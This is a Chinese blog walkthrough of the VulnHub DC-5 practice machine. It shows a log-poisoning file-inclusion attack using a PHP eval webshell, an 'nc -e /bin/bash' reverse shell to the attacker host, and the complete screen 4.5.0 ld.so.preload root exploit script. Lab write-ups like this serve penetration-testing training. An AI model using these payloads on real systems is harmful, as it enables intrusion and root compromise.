VulnHub靶场~DC-5

已于 2022-05-17 08:33:38 修改
阅读量737 收藏 1
点赞数
分类专栏: 靶机渗透 文章标签: debian linux 安全
于 2022-05-15 00:05:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47975351/article/details/124766663
版权

0X00 靶机的环境搭配

攻击机(Kali): 192.168.238.130

靶机(DC-5): 192.168.138

靶机地址:  DC: 5 ~ VulnHub

0X01 信息收集

一、IP扫描

┌──(root㉿kali)-[~]
└─#  arp-scan -l

二、端口扫描

┌──(root㉿kali)-[~]
└─#  nmap -T4 -sV -O -A 192.168.238.138

三、网站目录扫描

┌──(root㉿kali)-[~]
└─# dirb http://192.168.238.138

无敏感目录 

四、查看网站结构

无cms

 

五、网页信息获取

http://192.168.238.138/thankyou.php?firstname=&lastname=&country=australia&subject=

在Contact栏中有个好像是文件包含漏洞,下面的年份会随之发生变化,多刷新几次,发现也会改变,应该是刚才那个页面thankyou.php包含了footer.php

但是Nginx文件后面可以用文件包含

/var/log/nginx/access.log  日志文件

/var/log/nginx/error.log  错误文件

/etc/passwd 

0X02 

一、文件包含

http://192.168.238.138/thankyou.php?file=/etc/passwd

尝试访问passwd文件,确定是文件包含漏洞

二、上传一句话

2.1 抓包

http://192.168.238.138/thankyou.php?file=/var/log/nginx/access.log

#访问网站,抓包发送到重放器,添加一句话木马

<?php @eval($_POST['pass']);?>

2.2 蚁剑连接

http://192.168.238.138/thankyou.php?file=/var/log/nginx/access.log

0X03 交互式shell

一、监听端口

┌──(root㉿kali)-[~]
└─# nc -lvp 1234

二、反弹shell

(www-data:/var/www/html) $ nc 192.168.238.130 1234 -e /bin/bash

用蚁剑打开虚拟终端,连接kaili

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
192.168.238.138: inverse host lookup failed: Unknown host
connect to [192.168.238.130] from (UNKNOWN) [192.168.238.138] 56051
python -c "import pty;pty.spawn('/bin/bash')"    #交互式shell
www-data@dc-5:~/html$

0X04 提权

一、find查找漏洞

www-data@dc-5:~/html$ find / -user root -perm -4000 -print 2>/dev/null

找到正在系统上运行的所有SUID可执行文件

关注一下screen-4.5.0,GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话,并在其间自由切换,该版本存在本地提权漏洞。

二、Screen本地提权

2.1 搜索攻击方式

┌──(root㉿kali)-[~]
└─# searchsploit screen 4.5.0

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# cat 41154.sh

┌──(root㉿kali)-[~]
└─# cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
┌──(root㉿kali)-[~]
└─#

2.2 制作木马

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# vim libhax.c   #根据提示生成libhax.c木马

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# gcc -fPIC -shared -ldl -o libhax.so libhax.c  # 编译  

 

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# vim rootshell.c 

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# gcc -o rootshell rootshell.c  #编译

┌──(root㉿kali)-[~/桌面/靶机/dc-5]
└─# vim dc5.sh   #将剩余部分写入到dc5.sh,并最后输入 :set ff=unix保存

三、上传木马

www-data@dc-5:/var$ ls -l

查看文件夹权限,只有tmp可以任意读写,将木马上传到tmp文件夹下 

四、执行木马

赋予dc5.sh执行权限并运行

 

里丘~班诺
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1585
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5896
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub DC-5
Pai_Space
02-20 264
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
Vulnhub靶机练习DC-5 完整复现
黑战士的博客
02-23 899
注:最后提权那步失败了,若有大佬看到此文,还望指出问题,不胜感激!由于本靶机被搁置一段时间,IP地址会有变化故:192.168.200.11和92.168.200.58 都是靶机IP地址。
Vulnhub靶机渗透测试——DC-5
Cobra的博客
05-11 979
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.184 靶机下载地址: 二、信息收集 1、使用nmap进行存活主机探测 nmap 192.168.189.0/24 2、发现IP192.168.189.184开放80,111端口,再次使用nmap对其进行扫描 nmap 192.168.189.184 -sV -T4 -A -p- 3、访问其80端口 4、浏览页面并没有发现可以进行漏洞利用的地方,使用
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 1988
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub之dc5
qq_54030686的博客
06-13 308
这个靶场延续了dc系列一贯直白的套路,直接提升权限,实际操作中还是存在着一些未能解决的问题,话不多说,直接干 官方wp地址 主机发现 这里介绍一下 ip地址之后的24,代表24个字节,A段,B段,C段各占8个字节,也就是每一个段共有256个数字,检测B段的话,0/16,检测A段的0/8 目标为139,本机IP为128,进行端口检测 不知道为什么,我这边多个了45530端口,有可能是因为我做完的缘故,但是不影响,共有三个端口80为http服务,111为rpcbind服务,45530不晓得是哪个服务 谷歌大法中
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6174
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
DC-5靶场
xhx836161547的博客
12-14 713
DC-5黑盒测试靶场
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 753
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhub--DC5
weixin_55129870的博客
05-19 271
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
【DC-5靶场渗透】
一纸荒芜的博客
07-04 1518
DC-5 靶场
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值